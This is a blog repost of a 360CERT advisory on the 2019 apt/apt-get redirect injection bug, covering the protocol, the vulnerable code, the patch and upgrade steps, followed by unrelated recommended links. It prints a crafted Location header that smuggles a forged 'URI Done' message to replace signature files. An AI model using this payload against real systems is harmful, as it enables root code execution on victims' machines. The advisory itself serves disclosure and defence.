linux心跳包检测代码_运维人员注意:Linux 包管理器apt/apt-get远程代码执行漏洞预警...

最新推荐文章于 2023-04-17 11:56:54 发布
最新推荐文章于 2023-04-17 11:56:54 发布
阅读量151 收藏
点赞数
文章标签: linux心跳包检测代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39853523/article/details/111646270
版权
该博客文章详细介绍了2019年发现的Debian包管理器APT的一个严重漏洞,该漏洞允许攻击者通过HTTP中间人攻击执行远程代码。攻击者可以通过构造特定的HTTP响应来绕过APT的签名验证,导致受害者安装恶意软件。360CERT建议用户更新APT软件或检查服务器流量。文章还提供了漏洞利用的详细过程和补丁分析,以及针对不同Debian系发行版的修复建议。
摘要由CSDN通过智能技术生成
e8c52bcf58d081155db6f353c042dba7.png

0x00 漏洞背景

2019年1月22日 @Max Justicz 在其博客中公开了有关于 debian 系包管理器apt/apt-get 远程代码执行的一些细节。当通过 APT 进行任意软件的安装、更新等,默认会走 HTTP 而非 HTTPS,攻击者可以通过中间人劫持等手法劫持 HTTP 流量,并通过重定向及相关响应头的构造,完美构造合法的安装包签名,以此绕过 APT 本地签名的判断。攻击一旦触发,便可导致目标服务器的 root 权限被拿下。

360CERT 判断该漏洞危害严重,影响面有限。建议使用Debain系发行版的用户及时进行apt 软件的更新或者对服务器进行流量自查。

0x01 漏洞详情

在获取数据时,apt会fork出worker进程用于数据传输。父进程使用类似于HTTP的协议通过stdin/stdout与这些worker进程进行通信,告诉它们下载什么以及将下载的内容放在文件系统的什么位置上。例如,当apt install cowsay时fork出/usr/lib/apt/methods/http,返回一条100 Capabilities消息:

100 CapabilitiesVersion: 1.2Pipeline: trueSend-Config: true

父进程会发送它的设置并且请求一个资源:

601 ConfigurationConfig-Item: APT::Architecture=amd64Config-Item: APT::Build-Essential::=build-essentialConfig-Item: APT::Install-Recommends=1(...many more lines omitted...)600 URI AcquireURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debFilename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.debExpected-SHA256: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831Expected-MD5Sum: 27967ddb76b2c394a0714480b7072ab3Expected-Checksum-FileSize: 20070

然后worker进程的响应像下面这样:

102 StatusURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debMessage: Connecting to prod.debian.map.fastly.net102 StatusURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debMessage: Connecting to prod.debian.map.fastly.net (2a04:4e42:8::204)102 StatusURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debMessage: Waiting for headers200 URI StartURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debSize: 20070Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000201 URI DoneURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debFilename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.debSize: 20070Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000MD5-Hash: 27967ddb76b2c394a0714480b7072ab3MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831Checksum-FileSize-Hash: 20070

当HTTP服务器返回redirect重定向时,worker进程返回103 Redirect而不是201 URI Done,然后父进程使用这个响应来确定接下来应该请求的资源:

103 RedirectURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debNew-URI: http://example.com/new-uri

漏洞在于对Location进行URL解码后就将其直接将其附加到103 Redirect响应中,造成了注入。

// From methods/basehttp.ccNextURI = DeQuoteString(Req.Location);...Redirect(NextURI);// From apt-pkg/acquire-method.ccvoid pkgAcqMethod::Redirect(const string &NewURI){ std::cout << "103 RedirectURI: " << Queue->Uri << "" << "New-URI: " << NewURI << "" << "" << std::flush; Dequeue();}

如果HTTP服务器返回的Location为:

Location: /new-uri%0AFoo%3A%20Bar

则响应包如下:

103 RedirectURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debNew-URI: http://deb.debian.org/new-uriFoo: Bar

那么再进一步构造:

Location: /payload%0A%0A201%20URI%20Done%0AURI%3A%20http%3A//deb.debian.org/payload%0AFilename%3A%20/var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpg%0ASize%3A%2020070%0ALast-Modified%3A%20Tue%2C%2007%20Mar%202017%2000%3A29%3A01%20%2B0000%0AMD5-Hash%3A%2027967ddb76b2c394a0714480b7072ab3%0AMD5Sum-Hash%3A%2027967ddb76b2c394a0714480b7072ab3%0ASHA256-Hash%3A%20858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831%0AChecksum-FileSize-Hash%3A%2020070%0A

就会形成具有危害的情况:

103 RedirectURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debNew-URI: http://deb.debian.org/payload201 URI DoneURI: http://deb.debian.org/payloadFilename: /var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpgSize: 20070Last-Modified: Tue, 07 Mar 2017 00:29:01 +0000MD5-Hash: 27967ddb76b2c394a0714480b7072ab3MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831Checksum-FileSize-Hash: 20070

这时apt就会受到攻击者的控制,安装指定的package并且可以完美通过校验步骤,进而导致apt/apt-get安装到非官方源中的package。而由于apt/apt-get一般情况下只能由权限相对较高的用户执行,进而导致恶意的package可以任意执行代码/命令。

0x02 补丁分析

AcqMethod::Redirect函数通过对NewURI中的字符进行校验来修复该漏洞。

82f77472fd8f8b94837de100182a2986.png
f61aced58f8ae1d8b3e09a1db899ca4d.png

0x03 修复建议

Debain 可以通过添加 security 分支的源进行更新,主分支还受到影响

0d7f23504e5b1dfe1710771ab9818a43.png

确保

/etc/sources.list

含有如下字段

deb http://deb.debian.org/debian-security/ {发行版编号例如stretch}/updates maindeb-src http://deb.debian.org/debian-security/ {发行版编号例如stretch}/updates main

再执行

apt update && apt-get install apt

即可完成修复更新

Ubunutu 可以进行软件包版本升级

对应系统升级到如下版本:

  • Ubuntu 18.10 apt - 1.7.0ubuntu0.1
  • Ubuntu 18.04 LTS apt - 1.6.6ubuntu0.1
  • Ubuntu 16.04 LTS apt - 1.2.29ubuntu0.1
  • Ubuntu 14.04 LTS apt - 1.0.1ubuntu2.19

或者在更新时禁用 HTTP 重定向:

$ sudo apt update -o Acquire::http::AllowRedirect=false$ sudo apt upgrade -o Acquire::http::AllowRedirect=false

再者可以使用完全由 https 构成的源进行更新

0x04 时间线

2019-01-22 @Max Justicz公开漏洞细节

2019-01-23 360CERT发布预警

0x05 参考链接

  1. Remote Code Execution in apt/apt-get
  2. [https://justi.cz/security/2019/01/22/apt-rce.html]

作者:360cert

weixin_39853523
关注
heart_packet.rar_Linux心跳包_linux 网络_linux心跳程序_心跳包_心跳包 linux
09-21
心跳包通常被用在网络监控、高可用性集群和远程过程调用等场景,它通过周期性地发送小数据检测网络连接的健康状况。在这个"heart_packet.rar_Linux心跳包"压缩中,含了一个实现心跳包机制的Linux网络通信...
配置让apt将suggest和recommend的也能顺带安装?
whatsyourname的专栏
07-03 890
/etc/apt/apt.conf:  (debian6我安装的没有这个文件,直接创建就可以了)  APT::Install-Recommends "true"; APT::Install-Suggests "true";   or sudo apt-get install &lt;package&gt; -o APT::Install-Suggests=true  ...
ubuntu下的安装工具apt-get
王洪伟的专栏
12-08 1万+
前一段时间在ubuntu 12.10上安装软件。系统的apt在别人装软件失败后变得很奇怪,总是提示一些奇怪的信息。不管怎么样,就是不干活!所以,有了这篇内容。一、通常情况下,在安装软件的时候(比如apache2),执行sudo apt-get install apache2二、如果没有正确执行,可能是系统安装后软件列表中内容较少不含这些软件,而且没有更新。这时候,需要执行sudo apt-get
如何配置apt-get默认安装suggeted packages
weixin_34344677的博客
08-24 142
在使用apt-get安装的时候,常常会遇到apt-get会建议的,但实际上却木有安装: root@Pure:/etc/puppet/modules/apache# apt-get install ipython Reading package lists... Done Building dependency tree Reading state informatio...
网络安全之APT
最新发布
qq_57289939的博客
04-17 1593
APT攻击即高级可持续威胁攻击,也称为定向威胁攻击,指某组织对特定对象展开的持续有效的攻击活动APT--- 黑客以窃取核心资料为目的,针对客户所发动的网络攻击和侵袭行为,是一种蓄谋已久的“恶意商业间谍威胁”。这种行为往往经过长期的经营与策划,并具备高度的隐蔽性。APT的攻击收发,在于隐匿自己,针对特定对象,长期、有计划性和组织性地窃取数据,这种发生在数据空间的偷窃资料、搜集情报的行为,就是一种“网络间谍”的行为APT攻击--- 一个集合了多种常见攻击方式的综合攻击。
心跳机制详解
null
07-06 2万+
应用场景: 在长连接下,有可能很长一段时间都没有数据往来。理论上说,这个连接是一直保持连接的,但是实际情况中,如果中间节点出现什么故障是难以知道的。更要命的是,有的节点(防火墙)会自动把一定时间之内没有数据交互的连接给断掉。在这个时候,就需要我们的心跳包了,用于维持长连接,保活 什么是心跳机制? 就是每隔几分钟发送一个固定信息给服务端,服务端收到后回复一个固定信息如果服务端几分钟内没有...
xintiao.rar_Linux心跳包_心跳 linux_心跳包_心跳包 linux_心跳服务器
09-20
在IT领域,尤其是在网络通信和系统管理中,"心跳包"是一个非常重要的概念,尤其在Linux环境下。心跳包,也称为“ping”,是用于检测网络连接状态或维持长连接的一种技术。它的工作原理是通过周期性地发送小型...
Remote-terminal-management-system.zip_linux 远程_remote_心跳 linux_终
09-21
远程终端管理系统是IT行业中一种重要的工具,特别是在分布式和云计算环境中,它允许用户通过网络对远程计算机进行管理和控制。本系统涵盖了多个关键功能,括客户端、服务器、心跳机制、登录安全、会话管理以及丰富...
Linux运维-6.集群-集群视频-3、高可用集群(HAC)-课件
11-02
2. 高可用性原理:学习HAC的工作机制,如心跳检测、故障检测、资源管理、故障恢复策略等。 3. Linux集群架构:探索Linux集群的常见架构,如主-从模型、对等模型,以及它们在不同场景下的应用。 4. Pacemaker配置:...
apache-activemq-5.0.0-src.zip_ActiveMQ 源代码_activemq_activemq.src
09-20
代码揭示了网络连接、心跳检测和故障恢复的机制。 4. **集群与高可用性**:ActiveMQ支持集群部署,提供故障转移和负载均衡。源代码含集群配置和节点间通信的逻辑。 5. **安全机制**:ActiveMQ提供了用户认证...
海康威视网络视频SDK编程指南DVR-NVR
12-14
海康威视网络视频SDK编程指南,很实用!海康二次开发必看文档
debian系统dns服务器的配置,Debian下的DNS配置
weixin_32801929的博客
08-05 3178
Rate this post在root模式下apt-getinstallbind9安装bind9安装完成后进入bind9配置目录cd /etc/bind上图是bind目录下所有dns配置文件首先打开named.conf.optionsVi/etc/bind/named.conf.optionsforwarders前的注释斜线去掉Ip改为当地DNS(暂用谷歌代替)这样你的DNS不但可以解析...
Linux管理器apt/apt-get发现远程代码执行漏洞
cpongo55
01-23 206
\u003cp\u003e研究人员Max Justicz日前发现了知名Linux管理器apt/apt-get中的远程代码执行漏洞,该漏洞允许外部进行中间人攻击并获取root权限以执行任何代码。该漏洞已在最新版本apt修复,如果担心在升级过程中遭到攻击,可以使用以下代码关闭HTTP重定向功能进行安全升级:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e...
APT攻击检测与防御详解
热门推荐
Antrn
01-20 4万+
APT定义 APT(Advanced Persistent Threat)是指高级持续性威胁,本质是针对性攻击。 利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式,APT攻击的原理相对于其他攻击形式更为高级和先进,其高级性主要体现在APT在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。在此收集的过程中,此攻击会主动挖掘被攻击对象受信系统和应用程序的漏洞,利用这些漏洞组建.........
Debian dns设置
sunzq55的博客
03-17 1万+
一、临时设置 直接修改 /etc/resolv.conf,例如直接添加nameserver 8.8.8.8。 注意:系统重启或resolvconf重启后会刷新该配置文件。 二、 永久配置 /etc/resolv.conf是一个链接,指向/run/resolvconf/resolv.conf,/run/resolvconf/resolv.conf的内容是由/etc/resolvconf/resolv.conf.d/base加载过去的。 # 进入/etc/resolvconf/resolv.conf.d/文件夹
我的AI之路(27)--用C++实现机器人与机器人后端控制系统之间的双向通讯
XCCCCZ的博客
03-17 2670
 前面说过,机器人和机器人后端管理系统之间通常要求频繁双向传输数据、尤其需要最好保持长连接的通讯需求,使用WebSocket连接是最好的选择,可以基于RosBridge来实现,但是RosBridge实现的是websocket server,对于要求机器人后端管理系统在系统启动时主动连接机器人的需求是比较合适的,对于反过来要求机器人启动时作为client主动连接机器人管理系统的这种更常见需...
APT 高级漏洞利用技术
chengying332
02-12 635
APT 高级漏洞利用技术 APT(Advanced Persistent Threat)--高级持续性威胁。 利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。本文档由360漏洞实验室主任袁仁广分享的有关APT技术知识... 详细解读 和小伙伴们一起来吐槽
八大典型APT攻击过程详解
树木_xzw的博客
01-13 3817
八大典型APT攻击过程详解 2013-08-27 17:55 启明星辰 yepeng 51CTO.com 字号:T | T APT攻击是近几年来出现的一种高级攻击,具有难检测、持续时间长和攻击目标明确等特征。本文中,小编带你细数一下近年来比较典型的几个APT攻击,分析一下它们的攻击过程。 AD:51CTO 网+首届APP创新评选大赛火热启动——超百万资源等你拿!
LINUX进阶(基础篇)之Linux输入输出重定向
心跳包的博客
06-11 525
输入重定向:把指定文件导入到命令中 输出重定向:把原本要输出到屏幕的信息写入到指定文件中 输出重定向分为:标准输出重定向和错误输出重定向 [root@linuxprobe ~]# touch linuxprobe [root@linuxprobe ~]# ls -l linuxprobe total 0 drwxr-xr-x. 3 root root 14 Jun 11 15:07 a ...
Linux文件锁与心跳包:同步与保活实践
本文将深入探讨Linux环境下如何利用文件锁实现心跳包功能,以及文件锁在多用户多任务操作系统中的重要性。首先,我们了解到文件锁是操作系统提供的一种机制,用于控制对文件或特定区域的并发访问,特别是在并发编辑...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值